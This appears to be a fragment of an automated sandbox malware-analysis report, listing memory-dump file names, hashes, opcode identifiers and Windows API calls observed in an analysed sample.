                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FindMessagePostSleepWindow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 529655941-2988720461
                                                • Opcode ID: 259b0d884135d9435ba0666c0d05849a0e0585138cae55be32203862df2ff814
                                                • Instruction ID: 93904e0cadb13e02b698abd0cb8b1c5593b97f6ead4127b20c56c4caf3b1a81c
                                                • Opcode Fuzzy Hash: 259b0d884135d9435ba0666c0d05849a0e0585138cae55be32203862df2ff814
                                                • Instruction Fuzzy Hash: BDD0A9327C03007AF228B3B0ED0FFCA6A04AB44B00F0009227246AA1C0CAB0A801C68C
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 003AC233
                                                • GetLastError.KERNEL32 ref: 003AC241
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003AC29C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$ErrorLast
                                                • String ID:
                                                • API String ID: 1717984340-0
                                                • Opcode ID: 5a4666ec9c942661e3c34762ce5696dee0d7ffc795c6331bb368b1d4c9512895
                                                • Instruction ID: ee2d59a670d31bbb92f8e98643a68ee8496fdc566fdc0e79b1a6fa006af5f5ec
                                                • Opcode Fuzzy Hash: 5a4666ec9c942661e3c34762ce5696dee0d7ffc795c6331bb368b1d4c9512895
                                                • Instruction Fuzzy Hash: 7941B631610206EFCF279FE9C844BBA7BA9EF47710F265569E859AB1A1DB308D01C790